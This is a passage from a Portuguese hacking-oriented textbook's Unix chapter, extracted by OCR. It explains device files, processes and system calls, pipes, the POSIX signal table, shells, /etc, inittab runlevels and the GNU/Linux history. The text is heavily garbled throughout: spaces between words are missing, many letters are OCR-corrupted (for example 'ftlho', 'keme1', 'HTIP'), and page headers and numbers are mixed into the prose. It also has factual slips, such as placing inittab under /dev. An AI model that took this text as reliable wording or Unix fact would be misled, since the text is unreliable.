Oúltimotipodedispositivopresenteno/devsãoaschamadasinterfacesde
rede.EmsistemasLinux,sãorepresentadasno/devporethOparaaprimeira
placa,ethlparaasegundaeassimpordiante.EmumsistemaHP-UX,queusa
placasIntel,asinterfacesforamchamadasdeitlO,itll,etc.Hádispositivosde
redequesãopurosoftware.Doisexemplossãooloopback(interface10),que
direcionaotráfegoderedeparaaprópriamáquina(endereço127.0.0.0),eos
socketsdecomunicaçãodoservidorXWindow.
Asinterfacesderedesão,nofundo,dispositivosorientadosacaractere,embora
especializados.Emalgumasimplementações,osdispositivosSCSIsãoconsiderados
comoumquartotipodedispositivo,emborasejam,naprática,dispositivosdebloco.
Processos(não,issonãoépapodeadvogado)
EmumsistemaUnix,osprocessossãoasentidadesmaisimportantes.Além
dosprogramasdousuário,todososserviçoseservidoresquerodamemum
computadorcomUnixsebaseiamemumoumaisprocessos.UmamáquinaUnix
podeconter,entreoutrascoisas,umservidorWeb,umbancodedados,umservi-
dordee-mailsouumarádioon-tine.Cadaumdessesserviçoséchamadodedaemon
edisparaumoumaisprocessosidentificadospornúmerosúnicosemtodoo
sistema.Cadaprocessopossuiseunúmerodeidentificaçãoexclusivo.Oservidor
Webdoexemplopossuidiversosprocessosapenasparasemanter"noar",e
1961
PlataformaUnixI

Universidade1°ano
cadaconexãodeumbrowserdeInternetaalgumapáginadesseservidorcria
maisumprocesso.Éfácilperceberquenumarranjocomoessehásistemas
Unixcommilharesdeprocessossimultâneos.
Oprimeiroprocessogeradoporumprogramaqualqueréchamadodepai.
Cadaumdosprocessosgeradosporessepaiéchamadodefilho.Comohávári-
osníveisdeprocessos,podemosdizerqueumprocessosempreéftlhodeou-
tromaisprimitivoepodeelemesmoserpaideoutrosprocessosmaisnovos.
Háduasmaneirasdeiniciarumprocesso.Aprimeiraéamaistrivial:ousuárioemite
umcomandonoprompteoshelltransformaessecomandoemumprocesso.Masháa
possibilidade(ouantes,anecessidade)deiniciarprocessosautomaticamente.
NainicializaçãodoUnix,okeme1,assimqueécarregado,tratadeiniciaroprimei-
roprocesso:oinit.Eleéopaidetodososoutrosprocessosgeradosapartirdeentão.
Oinitfinalizaoprocedimentodebootcarregandoasconfiguraçõesdosistemae
inicializandotodososdaemonsreferentesaosserviçosqueamáquinadeveoferecer.
Algunsdessesdaemonssãoserviçosderede,comoe-mail(SMTP)eWeb(HTIP).
Taisserviços"escutam"aredeàesperadesolicitaçõesvindasdeoutroscompu-
tadores.Porexemplo,umserviçoHTTPesperaquecomputadorescombrowsers
deInternetconectem-seaele.Casoaconexãosejaestabelecida,odaemoncor-
respondenteenviaaonavegadordooutrocomputadorapáginasolicitada.
Éinteressantenotarqueessesserviçosesperamcontinuamenteporcone-
xões,oquesignificaqueconsomemrecursosdamáquinamesmoquandoocio-
sos.Paraevitarisso,osserviçosmenosrequisitadospodemseragrupadosem
umsuperservidorchamadoinetd,queaguardaporconexõesadiversosservi-
ços.Casoumdessesserviçossejasolicitado,oinetdcarregaodaemonnecessá-
rio.Quandoaconexãoacaba,oinetddescarregaodaemondamemória.
~
~~:~!~J
+
[~iI~~j Osprocessoscomunicam-seentresipor
meiodesinaiseemitemrequisiçõesaosiste-
maoperacionalatravésdaschamadasdesis-
temaousystemcaIls.Hádiversossinaisecha-
madaspadronizadaspelanormaPOSIX.
Sempre"escutam"
aredeàespera
deconexões
IIpeloINETO Ei,poderiamefazerumfavor?
Semprequeumprocessoprecisadealgumacoisadocomputador,emiteuma
chamadadesistemaaokernel.Astarefasqueasaplicaçõespedemaokernel
podemserdeacessoaperiféricos,solicitaçãoàCPUpara"fazerumaconta"ou
requisiçãodemaismemória.ExistemdezenasdesystemcaIls.Asmaisbásicas
sãofork,execewait.Aforkcriaumprocessoftlhoqueéumdonedoprocesso
pai:temasmesmascaracterísticas,trabalhacomosmesmosarquivosjáabertos
(emborapossaabriroutrosnovossóparasi)e,omaisimportante,pertenceao
1971
IPlataformaUnix

IUniversidadeH4CK3R I
mesmoprogramaquegerouoprocessopai.Asúnicasdiferençassãoonúmero
deidentificaçãodecadaprocessoeonúmerodeidentificaçãodoprocessopai.
JáachamadaexectransfereocontroledaCPUparaoutroprocessoouprogra-
ma.Osarquivosqueestavamabertosparaoprogramaoriginalsãoredirecionados
paraosprocessosgeradospelonovoprograma.Usandoambasaschamadas
nessaordem(forkdepoisexec),umprocessocriaumftlhoetransfereocoman-
doparaele.Quandooprocessoftlhocompletarsuatarefa,enviaosresultados
doprocessamentoaopai.
Aduplafork+exec,entretanto,nãoevitaqueoprocessopaicontinuerodan-
do.Paraqueoprocessopaientreemhibernaçãoeespereparadootérminodo
processoftlho,usa-seachamadadesistemawait.Comooprocessopaiestá
dormindo,nãoentranotimesharingdamáquinae,portanto,economizareçur-
sos.Oprocessopaisóvoltaráaosciclosdeprocessamentodamáquinaquando
oprocessoftlhodeixardeexistirou,nojargãotécnico,"morrer".
Umexemplopráticoéalinhadecomandooushell.Imaginequeousuário
digitouumcomandoeoshellficoucongelado,sendoliberadosomentedepois
deocomandoserfmalizado.Nessecaso,oshe11emitiuumachamadawaitpara
ocomandodousuário.Seporoutroladoousuárioemitirumcomandoe,ape-
sardeoprogramaaindaestarrodando,opromptaparecerimediatamente,é
indíciodequeoshe11nãousouachamadadesistemawait.
Comunicaçãoentreprocessos
Hácasosemque,emvezdesolicitaremalgumacoisaaoSO,osprocessosnecessi-
temcomunicar-seunscomosoutros.Umadasformaspossíveiséacomunicação
entreprocessospaiefilhos.Oprocessopaipode,porexemplo,fazerumachamada
desistemaptracepararastrearpossíveisbugsdeprogramaçãonoprocessofilho.
Outroexemplodecomunicaçãoentreprocessossãoospipesoudutos.Pipes
sãoumamaneiradeoprópriousuáriodeterminaraligaçãoentreasaídadeum
processoeaentradadeoutro.Issoéfeitonalinhadecomando,comocaractere
I(que,nãoporacaso,chama-sepipe...).Observeocomandoaseguir:
$ps-e Igrepnetscape
Essecomandotomaasaídadoprimeiroprograma(ps-e)eojoganaentrada
dosegundoprograma(grepnetscape).Observequeosdutostêmumapeculia-
ridade:apenasligamprocessosoriundosdomesmopai.Nocasoacima,osco-
mandospsegrepsão"irmãos",ftlhosdomesmoshell.
UmterceirométododeosprocessossecomunicareméatravésdosIPCMFsou
InterProcessCommunicationMessageFacilities.OsIPCMFsnadamaissãodoquefilas.
Existemprocessostransmissores,quesãoautorizadosacolocarmensagensnafila,e
processosreceptores,queobviamenteosretiram.Umexemplodeimplementaçãode
IPCMFssãoossPOOlsdeimpressão.Váriosprogramaseusuáriospossuempermissão
paraescrevernafiladeimpressão,eépossívelqueváriasimpressoras(eseusdevice
drivers)"puxem"documentosparaseremimpressosporelas.
198I
PlataformaUnixI

Universidade1°ano
Sinaisesemáforos
Osmétodosdecomunicaçãointerprocessosmaisprimitivos,entretanto,sãoos
sinais.Sãomensagensmuitosimplesqueumprocessoenviaaoutro.Apenaspro-
cessosativospodemenviarsinais.Comoapenasumprocessopodeestarativo
emumdadomomento-anãoserqueosistemapossuaváriospocessadores-,
umsinalcertamentevaiacordaroprocessodestino,queobviamenteestásuspenso.
Quandoumprocessosuspensovoltaàatividade,okerne1verificaseexiste
algumsinalparaele.Seexistir,osistemapodetomarumaentretrêsprovidênci-
as:ignorarosinal,entregá-Ioaoprocessodestinatáriooucapturá-Io.Quandoum
sinalécapturado,osistemaexecutaumadesuasrotinasdetratamentodesinal,
quevariadeacordocomanaturezadomesmo.
Origina1mente,eramconsiderados22sinais.SegundoopadrãoPOSIX.1,hoje,há31
sinaisdiferentes,cadaumsolidtandoumaaçãoespeáficanoprocessodestino.Sãoeles:
N°INOME SIGNIFICADO
1SIGHUP
2SIGINT
3SIGQUlT
4SIGILL
5SIGTRAP *
6SIGIOT/SIGABRT
7SIGEMT *
8SIGFPE
9SIGKILL
10SIGBUS *
11SIGSEGV
12SIGSYS*
13SIGPIPE
14SIGALRM
15SIGTERM
16SIGUSR1
17SIGUSR2
18SIGCLD
19SIGPWR*
20SIGWINCH*
21SIGURG*
22SIGIO*
23SIGSTOP
Desligaoprocessodevidoàmortedoprocessopai
Processointerrompidopeloteclado
Fechaoprocessoeodescarregadamemória
Informaqueoprocessofezumaoperaçãoilegal
Trace/breakpointtrap -pararastreamentodebugs(SystemV)
Abortaprocesso
EMTTrap(SystemV)
Exceção(erro)empontoflutuante
Encerra("mata")oprocesso-nãopodeserignorado
Acessoàmemóriadefeituosa(SystemV)
Referênciainválidaàmemória(segmentationfault)
Chamadadesistemacomargumentoerrado(SystemV)
Dutoquebrado:nãoháprocessorecebendoosdados
DespertadororigináriodocomandoC"alarm"
Encerraoprocesso-podeserignorado
Sinaldefinidopelousuário
Sinaldefmidopelousuário
"Morte"deumprocessoftlho
Quedadeenergia(SystemV)
Redimensionajanela(BSD4.3eSun)
Condiçãourgenteno'socket'(BSD4.2)
E/Sépossívelagora(BSD4.2)
Congelaprocesso
1991
1PlataformaUnix

IUniversidadeH4CK3R I
24SIGTSTP
25SIGCONT
26SIGTTIN
27SIGTTOUT
28SIGVTALRM *
29SIGPROF *
30SIGXCPU *
31SIGXFSZ *
StopdigitadonoterminalTIY
Mantémcongelado
Obtémdadosdoterminalparaprocessoemsegundoplano
Processoemsegundoplanoentregadadosaoterminal
Despertadorvirtual(BSD4.2)
Sinal"ProftlingTimerExpired"(SystemV)
TempodeCPUexcedido(BSD4.2)
Tamanhodoarquivoexcedido(BSD4.2)
AtabelaconsideraossinaisPOSIX.lemarquiteturaRISCMIPS.Arquiteturas
Alpha,Sparc,i386(PC)ePowerPCpossuemalgunsvaloresdiferentes.Porexem-
plo,parai386eSparcosinal16éSIGSTKFLT
-falhanocoprocessador.Sinais
marcadoscomasterisco(*)sãoapenaspartedaimplementaçãoGNU/Linux
-
nãosãopadrãoPOSIX.letêmsuaorigemindicadaentreparênteses.Consulte
man7signalsemseusistemaparainformaçõesmaisdetalhadasevisiteosite
(www.unix-systems.org)parasabermaissobreonovopadrãoPOSIX.2.
Ossinaissãotrocadosentreosprocessosemandamento.Épossívelforçar
manualmenteoenviodeumsinalapartirdoshellcomocomandokill.Onomedo
comandonãoénemumpoucoapropriado,poiselenãoéusadoapenasparaenviar
SIGTERMouSIGKILL(ouseja,mataroprocesso).Qualquersinalpodeserenviado
pelocomandokill.
Exemplodeutilização:
$kill-927536
Essecomandoenviaosinal9(SIGKILL)aoprocesso27536.Quandoonúmero
dosinalnãoéespecificado,osistemaassumeovalor15.
Alémdesinaisemensagenssimples,épossíveldizeraumprocessoparaguar-
darestruturasdedadosmuitomaiscomplexas.Usandoumaporçãodememória
chamadamemóriacompartilhada,osprocessosativospodem,atravésdesystem
calls,armazenardadosqueserãoutilizadosposteriormenteporoutrosproces-
sos.Paraimpedirqueoutrosprocessosalteremosdadosantesqueoprocesso
geradortenhaterminadodemexerneles,sãousadasentidadeschamadassemá-
foros,quebloqueiamoacessoàquelaposiçãodememóriaatéhaverliberação.
Nãoéobjetivodestelivroentraremdetalhessobreteoriaouparticularidadessobre
desenvolvimentodesoftware,sinaisechamadasdesistema.Entretanto,ésuaobriga-
çãoconhecê-Ios!Paramaisinformações,consulteanormaPOSIXdoSingleUnix
SpeciJication(wwwunix-systems.org)Tambémédeveraseducativoescolherumsa-
borqualquerdeUnixebuscarasespecificaçõesdofabricante.Umbomsistemapara
issoéoLinux,portertodooseucódigoabertoaopúblicoemgerale,portanto,não
éprecisopedirpermissãooupagartaxasaninguémparaisso.Alémdisso,oLinux
rodaemPCscomuns-vocêpodeestudarnoseucomputadorpessoal.
1100I
PlataformaUnixI

Universidade1°ano
Napraiacatandomexilhões
Tudobem,euseiqueéoquevocêqueriaestarfazendoagora.Masestamos
aquiparaser"hackers",não?Issoimplicaemnãotermaisnoitesdesono,ser
anti-socialepassarasfériastrancadoemcasatentandoinvadiraquelesite...
Brincadeirasàparte,épeloshellqueousuáriodizparaokerne1:"Ei,abraum
processoaíparaomeuprograma".Sevocêtivessededizerissodiretamente,
teriamuitadificuldade
-acomunicaçãocomokernelnãoélámuitointeligível.
Oshelltrabalhaentãocomoumintérpreteentrealínguaquefalamosea"lin-
guagem"docomputador7.
Noiníciodestecapítulousamosalgunscomandospara"navegarpelosistema
dearquivos".Masoshellnãoéumsimplesinterpretadordecomandos.Entre
osrecursosmaisimportantes,estáoencadeamentodecomandos,oupiping. .
Háalgumaspáginas,vimosqueoencadeamentodecomandoséumadasfor-
masdecomunicaçãoentreosprocessosequepodeserdisparadopelousuário
pormeiodocaractereI.Usandodiversospipes,umcomandodeapenasuma
linhapodefazercomqueumarquivooupedaçodeinformaçãosejaprocessa-
doporváriosprogramasseqüencialmente.Asaídadeumprograma"fluipelo
dutoedesemboca"naentradadoprogramaseguinte.Porexemplo,considereo
seguintecomando:
$Is Igrepb Isort-r IteearqsaidaIwc-1
Ocomandolslistaoconteúdododiretório.Emvezdemostrarnatela,o
pipejogaasaídadelsparaocomandogrepb,quefiltraosnomesdearqui-
vosquecontenhamaletrab.Emseguida,asaídadogrepéjogadanocoman-
dosort-r,queclassificaosnomesemordemdecrescente.Asaídadosorté
inseridanotee,quedivideosdadosemdoiscomosefosseumaconexãoemT
ou"benjamim".Asinformaçõesdosortvãosergravadasnoarquivo"arqsaída"
e,simultaneamente,sãopassadasaocomandowc-1,quecontaonúmerode
linhas.Comoresultadodessecomando,temosimpressonatelaaquantidadede
arquivosquecontémaletrab,enoarquivo"arqsaída"temosgravadososnomes
dessesarquivos.
Esseexemplovaialémdedemonstrarapossibilidadedeencadeamento.O
Unixfoipensadodesdeocomeçocomoumsistemaquetivesseferramentas
pequenas,maspoderosaseultra-especializadas.Taisferramentaspodemser
combinadasparaformarumaferramentamaioremaiscomplexaparaexecu-
tarumadeterminadatarefa.Comisso,evita-sea"reinvençãodaroda",poisusan-
do-seblocosbásicosdeconstrução-comonumLego(tm)-reaproveita-seo
trabalhojáexistente.Essavisãodifereradicalmenteda"maneiraWindows"de
fazerascoisas:programasgrandesquereúnemamaioriadasfunçõesqueo
usuáriopossaprecisar.NoUnix,menosémais.
7QualquerambientegráficonoUnixpodeserconsiderado"umshellsobreoshell..,portanto,oraciocínio
aquidescritoaindaéválido.Agrossomodotodososprocessosgeradosdentrodoambientegráficosãofilhos
oudescendentesdoservidorX,damesmaformaqueosprocessosgeradospeloshellsãofilhosdomesmoshell.
1101 1
1PlataformaUnix

IUniversidadeH4CK3R I
Minhacoleçãode conchas
Hádiversosshellsdisponíveisparaousuário.CadaimplementaçãodoUnix
adotaaquemaisconvémaofabricanteouaodestinoaserdadoaosistema.
NormalmentesãodistribuídostrêsshellscomosUnixcomerciais:Bourne,Korn
eCShell.Maisrecentemente,ossistemastambémincluemaversãoGNUdo
BourneShell,chamadadeBourneAgainShellouBash.Todoselessuportammani-
pulaçãodeprocessos,redirecionamentoepiping,característicascomunsemum
sistemaUnix.Mas,obviamente,cadaumtemsuasparticularidades.
Desenvolvidoem1975porS.R.Bourne,oBourneShellfoiumdosprimeiros
aseremimplementadoseserviucomoreferênciaaosquevieramdepois.Sim-
plificavasobremaneiraaoperaçãodoUnix,queatéentãocalcava-senumshell
muitoprimitivo.Masaindaeramuitosimples,emboraporissomesmoseja,até
hoje,omenoremtamanhoeomaisrápido.
AevoluçãodoBourneShellfoioCShell,desenvolvidopeloentãoprofessorBillJoy.O
CShellimplementouohistóricodecomandos(sevocêjádigitou,nãoprecisadigitarde
novo,bastaprocurarnalista),oalias(permiteatribuirapelidoscurtosalongoscoman-
doscomdiversospipes)econtroledeprocessosemforegroundebackgound.Masa
maiorcaracteristicadoC-Shelléasintaxedoscomandos,muitoparecidacomadoC,
facilitandosobremaneiraacriaçãodeshellscripts.Recentemente,foidesenvolvidoo
TCShellouTurboCShell,commelhoriasnainteratividadedareediçãodecomandos.
UmmôridodosdoisanterioresfoioKornShell,desenvolvidoporDavidKornda
AT&T.Eletentaserumaalternativacoerente,implementandoascaracterísticaspositi-
vasdeambososshellsanterioreseeliminandoasconflitantes.
OBashéareimplementaçãodoprojetoGNUparaoBourneShellerecebeudiversas
melhoriasnareediçãodelinhadecomando,emboramantendoasmesmascaracterísti-
casdoantecessorcomrelaçãoascripts.
Falamosalgumasvezesemshellscriptsnosúltimosparágrafos.Masoqueseráisso?
Scriptforajester'stear8
oshellé,primariamente,uminterpretadordecomandosqueresponde
interativamenteaosestímulosdousuário,mastambémpermitecriarumarquivo
comumalistadecomandosqueserãoexecutadosseqüencialmente.Comumpou-
codeprática,épossíveltransformaressas"listasdecomandos"emprogramas
úteisqueexecutamtarefasmuitocomplexas.Umprogramadortarimbadopode
implementarcomshellscriptsqualquerserviçoemumamáquinaUnix,inclusive
comacessodebaixonívelahardware,semprecisarconhecerCouAssembly.
Consulte(noCD)osapêndicessobreprogramação.Háumaparteespecialso-
breshellscript.Sugerimostambémqueoleitoraprofunde-senisso.Umbomhacker
transitacomgalhardiapelosUnixshellscripts.AInternetestárepletadesites
sobreoassunto,bastaprocurarnoseusitedebuscasfavorito.NoCDestão
incluídosalgunstutoriais.Pratique!Éimportante!
8ÁlbumdeestréiadabandabritânicaderockMarillion,lançadoem1980.
1102 I
PlataformaUnix[

Universidade1°ano
Todosossegredosestãono/etc9
DetodosostesourosescondidosnasentranhasdossistemasUnix,algunsdos
maisvaliososestãonessediretório:énelequetodasasconfiguraçõessão
mantidas.Vimosnocapítulo3queoMicrosoftWindowspossuiumaentidade
chamadaRegistroequetodoosistemagiraemtornodele.Oassuntotomou
grandepartedocapítuloanterior.EmsetratandodeUnix,hámaisasefalar
sobreosistemadearquivos,shelleprocessosdoquesobreo/dev.
Emborasejaachavedaoperaçãodosistema-naprática,quasetudooqueum
administradordesistemasprecisasaberestáaí-,o/etcétãosimplesdeserenten-
didoque,comoconjunto,nãohámuitooquesefalarsobreele.Asconfigurações
estãoguardadasemarquivosdetextopurohumanamentelegíveis.Osautoresvêem
essaabordagemcommelhoresolhosquandoconfrontadoscomoparadigmado
RegistronoWindows.Mas,comotudo,tambémháalgumasdesvantagensnessa
abordagem.Amaioriadelasadvémdafaltadepadrões,quefazcomqueoUnixda
lliM,oAIX,sejamuitíssimodiferentedoUnixdaSun,oSolaris,porexemplo.
AocontráriodoWindows,emqueoregistroégravadonormalmenteemdoisa
cincoarquivos,noUnixcadaaspectodosistemapossuiumarquivodiferente,nor-
malmentepequenoedeconteúdosimples.Bomparaamodularidadedosistema,
ruimparaaoperação:sãodezenasdearquivospadronizadosecentenasdeoutros
quesãodependentesdaimplementação.Éóbvioqueessecenárioémenoscompli-
cadoqueaorganizaçãodasHKEYSnoWmdows,masaindaassiméamedrontador.
Comobônus,ossistemasUnixnoslivramdasmalditaschavesCLSID
-parausar
umprogramacomoservidordeumscriptbastausarasAPIs,amplamentedocu-
mentadas,muitomaissimpleseemlínguahumana.Comodemérito,ajácitadafalta
depadrõesforçaosusuáriosaespecializarseusscriptsmaiscomplexos,poisnão
funcionarãodamesmaformaemtodasasimplementações.
InittabandtheRunLeveLs
(parecebandaderock,masnãoé...)
Logoapósoboot,okerneliniciaoprimeiroprocesso,paidetodos,oinit.A
primeiraprovidênciadoinitélersuatabeladescritiva,armazenadaem/dev/
inittab.Essearquivoinformaaoinitondeestãoosdaemonsquedevemser
inicializados,quaisosscriptsquecontêmastarefasdoprocessoinit,quantose
quaisterminaisserãoativadosealgumas"armadilhas"(traps)parasinaisdo
sistema,tratando-oscomarotinacorreta.
Oinittabtambéminformaoprocessoinitarespeitodosníveisdeexecução
(ourunlevels)dosistema.RunlevelssãodiferentesníveisnosquaisoUnixpode
operar,eindicamquaisserviçosdevemseriniciadospeloinitequaisdevemser
fmalizados.Umrunlevelmaisbaixoindicaquehámenosserviçosrodando,um
maisaltosignificamuitosdaemonssendoinicializados.Examinandoumsiste-
maRedHatLinux,encontramosseisrunlevels:
9TítuloreproduzidocomapermissãodaRevistadoLinux.
1103 1
1PlataformaUnix

IUniversidadeH4CK3R I I
o-Halt:osistemaencerrasuasatividadesedesliga
I-Monousuário
2-Multiusuário
3-Multiusuáriocomserviçosderede
4-Nãousado
5-XII:omesmoque3,masemmodográfico
6-Reboot:osistemaencerrasuasatividadesereinicia
CadasabordeUnixtemsuaprópriaconfiguraçãoderunlevels,emesmodife-
rentesdistribuiçõesLinuxpossuemesquemasdiversos.Porexemplo,num
SlackwareLinuxenumHP-UXoníveldeexecuçãodapartegráficaé4enão5.
Quandooinitécriado,okernelpassaaeleemqualrunlevelosistemadeve
funcionar.Seessainformaçãonãoforpassada,opróprioinittabinformaqualo
valordefault.ÉpossívelmudaroníveldeexecuçãoduranteaoperaçãodoUnix
comocomandoinitn,emquenénúmerodorunlevelparaoqualqueremos"ir".
Notequeosníveisdeexecuçãosãomeramentelistasordenadasdeprocessos
asereminiciadosou[malizados.Quandovocê"passa"dorunlevel3parao5
(comocomandoinit5),porexemplo,váriosprocessosdorunlevel3sãotermi-
nadosantesqueosdorunlevel5sejaminicializados.Enotetambémqueousuá-
riopode,manualmente,chamarprogramasnãoprevistosnessenível.Estando
emrunlevel3(modotexto)ousuáriopodechamaroservidorXetrabalharem
umambientegráfico.Elenãoprecisoudeixaronível3eentrarno5paraisso.
Tenhaemmentequeosrunlevelssãomeiosdefacilitaraadministraçãodo
queseráinicializadoquandovocêligaamáquina.Fazendoumparalelocomo
antigoMS-DOS,pensenelescomoumasériedearquivosAUTOEXEC.BAT,cada
uminiciandoumagamadiferentedeprogramas.
Todososdaemonsinicializáveisnobootpossuemumscriptnodiretórioinit.d.Na
maioriadossistemasLinuxestediretórioestáno/etc,nosoutrossaboresdeUnix
issovariabastante.NoHP-UX,porexemplo,taisscriptsestãoem/bin/init.d.Eles
carregamedescarregamodaemonnamemória,fornecemoestadodeexecuçãodo
programa,recarregamasconfiguraçõesdomesmosempararoprocessamento
-
tudodependedoparâmetropassadoaoscript-epodemserexecutadosmanual-
mentepelosuperusuário,casoqueirapararouiniciaralgumserviço.Massãousados
principalmenteparaainicializaçãoautomáticapeloesquemaderunlevels.
HáumoutroconjuntodediretórioschamadosdercN.d,sendoNonúmerodo
níveldeexecução.Osserviçosasereminicializadosnorunlevel3,porexemplo,
estãoemrc3.d.Alocalizaçãodesseconjuntodediretóriostambémvariamuito
entreosdiferentessaboresdeUnix.Podemestarem/etc,/etc/init.d,/sbinou/bin.
DentrododiretóriorcN.dhádiversoslinkssimbólicos.Pensenoslinkssim-
bólicos(ousymlinks)comoosatalhosdoWindows:entidadesqueapontam
paraoarquivoverdadeiro.Osnomesdosymlinksdessesdiretóriostêmase-
guinteestrutura:
104
I
PlataformaUnixI

Universidade1°ano
Xnnnnome_do_daemon
Xpodeserumadeduasletras:SouK.Sindicaaoprocessoinitqueodaemon
temdeserinicializadoquandoseentranaquelerunlevel,eKindicaqueodaemon
temdeserterminadoaosairdorunlevel.nnnéumgrupodetrêsalgarismos
queindicaaordempelaqualosprocessossãoiniciadosoumortos.Sistemas
GNU/Unuxusamapenasdoisalgarismos.
Onome_do_daemonserveapenas
paraidentificarosymlink.
Umexemploprático.Oservidordee-mailsendmailtemdeserinicializadoquan-
doentramosnonível3.Paratanto,háumsymlinkapontandoparainit.d/sendmail:
S980sendmail
Issoindicaaoprocessoinitparainicializarosendmailnaposição980(ouseja,
depoisqueosserviçoscomnúmerosmenoresjáestivereminicializados).Quan-
dooUnixdeixaorunlevel3(nodesligamentodamáquina,porexemplo),olink
simbólicocorrespondente-tambémapontandoparainit.d/sendmail-é:
K120sendmail
indicandoaoinitparadesligarosendmailnaposição120,depoisquetodos
osprocessoscomnumeraçãomaisaltaque120játiveremsidoterminados.
CadasabordeUnixpossuiuminittabeumesquemaderunlevelsque,apesar
desemelhantes,sãodiferentes.Sugerimosaoleitorquevasculheessesarquivos
emtodososUnixqueestiveremàmão,comparando-osentresi.Nãoseatenha
apenasaoinittab:visitetodososarquivosindicadosnele.
Outrasgemas
O/etcencerraarquivosdeconfiguraçãoimportantes,muitosdelesdeaspectosjá
tratadosnestecapítulo.Nãoénossoobjetivoserumafontecompletadeinformações
sobreUnix-naverdade,estelivroapenasarranhaasuperfície.Masumapesquisa
maisaprofirndadanoconteúdododiretórioserádegrandevaliaparaoleitor.
Comonãohámuitosegredoemvisualizararquivosdetexto,deixamosaolei-
toroónusdedescobrircomoeparaqueservemcadaumdosarquivospresentes
no/etc.Abaixoháumalistacomosarquivosrelevantesnamaioriados"sabores".
Interrompaaleituradolivroporumasemanaeestude-ostodos,consultando
sempreapáginademanual(mannome_do_arquivo)associada.Algunsnomes
podemserdiferentesemseuUnix,masoarquivocorrespondenteestálá.Seo
arquivoindicardiretóriosououtrosarquivos,visite-osevejaoqueelescontêm.
services
protocols
inetd.conf/xinetd.conf
crontab
profile
bashrc
cshrc
shrc
passwd/group/shadow
hosts
host.conf
1105 I
]PlataformaUnix

IUniversidade
resolv.conf
inittab
fstab(vfstabnoSolaris)
mtab
ld.so.conf
netgroup
netmasks
termcap/printcap/screenrc
todaaestruturaabaixodeinit.d
todaaestruturaabaixoderc.d
todaaestruturaabaixodesysconfig
Dica:emvezdecat,useparavisualizarosarquivosocomandomore,que
mostraumapáginadevídeoporvez.Seoseusistemapossuir,useo1essao
invésdomore-comeleépossívelretrocederapáginasanteriores.
omeueuquerodeflocos...
Hávários"sabores"comerciaisdeUnix,cadaumdelescomsuasqualidadese
problemas-entreelesopreço.ComoentãosaberqualUnixéomelhorpara
você?Estaéumaperguntadificildeserrespondida.Normalmente,omelhor
Unixéoquevocêjáusa,ouoquevocêestámaisacostumado.Outrasvezeso
melhorUnixéoquejávemconfiguradodefábrica,ésóligareusar.Outrasainda
dependemdopreçobaixo.Comosãoprodutosproprietários,joga-sedeacordo
comessasregras.Seurepresentantetécnicoéseumelhoramigonessahora.
MasháopçõesdesistemasUnixaquemchamamosdelivres.Sãosistemasoperacionais
parecidoscomoUnix,mascujocódig~fonteéaberto-qualquerumpodelê-loe saber
comofunciona.Sãonormalmentemantidosporvoluntáriosouempresasengajadasna
produçãodeumsistemaquesejaindependentedefornecedor.
Novamente,hávantagensedesvantagens.Dentr<.fasvantagens,existeacerteza
dequeoprodutonãopossuifalhas-esehouver,vocêmesmopodecorrigi-las.Mas
vocêtemcertezadequeelasnãoestãoescondidas,umtristeatodemá-fédealgu-
masempresasdetecnologiaporaí...Outravantageméoaltograudepersonalização
queumsistemadessesoferece.Sendoaberto,qualquerumpodemodificá-lopara
atenderaseusinteresses.
Adesvantagemficaporcontadosparadigmasgeradospelomodelotradicio-
naldenegócios,sendogarantiaesuporteosmaiscomentados.Issoéresolvido
emparteporempresasquevendemsoluçõesbaseadasnessessistemas,mas
aindaéummercadonãoconsolidadoehámuitosamadoresàsolta.Atéquese
separeojoiodotrigo,muitosterãoperdidodinheirocomeles-eerradamente
colocarãoaculpanosoftware.
11061
PlataformaUnixr

Universidade1°ano
Freeasinfreespeech...
Nosprimórdiosdacomputação,nãohaviaessanoçãodesoftwareabertoou
proprietárioporquetodososprogramaspodiamserlivrementecompartilha-
dos.Osusuáriosdeinformáticadeentãoeramquasetodoscientistas,eo
compartilhamentodeinformaçõeséalgotrivialentreeles.Odinheirodomer-
cadodeinformáticacirculavaapenasparaasmãosdosfabricantesdehardware.
Mas,àmedidaqueotempofoipassando,apareceramempresasprodutorasde
softwaredestinadoàvenda.Obviamentenãoeradointeressedessasempresas
queseussoftwaresfossemcopiadosedistribuídosgratuitamente,portantoo
código-fontenãoeradivulgado.Issopassouasercomumapartirdeentão.
RichardStallmaneraumprogramadorquetrabalhavaparaumaempresapri-
vada.Ocorrequeescreveuumprogramaqueachourealmentebomequis
compartilhá-locomacomunidadeUnixdeentão-masfoiimpedidopeloseu
empregador.Stallmannficoutãofrustradoqueradicalizou:pediudemissãoe,
em1984,criouumprojeto-oGNU-eumalicença-aGPL.
OprojetoGNUlO-GNU'sNotUnix-éumatentativadecriarumclonedos
sistemasUnixqueStallmannusava,masquenãopossuamnenhumcódigoorigi-
naldaAT&T.Jáforamcriadasdiversasferramentasparaosistema,incluindoas
demanipulaçãodearquivos(1s,cd,pwd,caL.),compiladores(gcceg77,paraC
eFortran,respectivamente)eprogramascomplexoscomoalinguagemdescripts
gawkeoeditordetextosEmacs.Okemel,entretanto,nuncaficoupronto.
AlicençaGPL-GeneralPublicLicenceouLicençaPúblicaGeral
-expressa-
mentepermiteacópiaeadistribuiçãogratuitadoprogramasobessalicença,
desdequeoscódigos-fontedoprogramasejamdistribuídostambém.Issoper-
miteareutilizaçãodocódigoporoutraspessoassemrestrições-anãoserade
respeitarosdireitosdosautoresoriginaisenuncafecharocódigoresultante,
impedindoqueoutrostenhamacessoaele.
DetalhessobreoqueéSoftwareLivreeoqueéCódigoAbertoencheriam
todasaspáginasdestelivro.Nossoobjetivonãoéversarsobreesseassunto.
MaisinformaçõespodemserobtidasnositeoficialdoprojetoGNU
(www.gnu.org).daFreeSoftwareFoundation(www.fsf.org)edoOpenSource
Initiative(www.opensource.org).
Adançadospingüins
Comovimos,oprojetoGNUempacounodesenvolvimentodeseupróprio
keme1.Nessemeiotempo,umfinlandêsmalucochamadoLinusTorvaldscriava
umkernelqueseriaumfenômenomundial:oLinux.Inicialmenteapenasum
sistemadecomunicaçãocomumBBS,oprotótiporapidamenteevoluiupara
10DepoisdoGNU,viroumodacriarprogramascujosnomessejamsiglasrecorrentes.Osímbolodo
projetoGNUéumanimalencontradonaÁfricaeparecidocomumbisão,cujonomeé...Gnu.
1107 I
]PlataformaUnix

IUniversidadeH4CK3RI
umkerne1completo.Em1991,TorvaldsdecidiucolocaroLinuxsobrealicença
GPLeusarasferramentasGNUcomseukernel.Éporissoqueospreciosistas
domundodacomputação(eumeincluonestegrupo!)referem-seaosistema
comoGNU/Linux-seriainjustocomoSr.Stallmansenãofosseassim.
